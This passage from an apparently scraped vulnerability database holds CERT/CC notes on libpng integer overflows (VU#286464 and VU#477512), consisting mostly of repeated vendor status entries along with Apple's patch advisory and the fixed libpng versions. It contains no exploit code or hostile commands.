Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### IBM Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Immunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Microsoft Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 
vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Red Hat Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### SCO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 
Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Sun Microsystems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Unisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0599](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0599>) \n---|--- \n**Severity Metric:** | 0.97 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-01 21:40 UTC \n**Document Revision: ** | 14 \n", "modified": "2005-06-01T21:40:00", "published": "2004-08-04T00:00:00", "id": "VU:286464", "href": "https://www.kb.cert.org/vuls/id/286464", "type": "cert", "title": "libpng contains integer overflows in 
progressive display image reading", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:44", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a flaw that could introduce a remotely exploitable vulnerability.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nA potential integer overflow error exists during a memory allocation within the `png_handle_sPLT()` function. While the code that contains this error introduces a dangerous condition, it is unclear what practical vulnerabilities it might present in applications using libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n477512\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: July 16, 2004 Updated: June 01, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. 
\n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please 
send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). 
An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. 
\n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Cray Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IBM Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Microsoft Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 
Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Red Hat Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### ScO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 
Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Sun Microsystems Inc. 
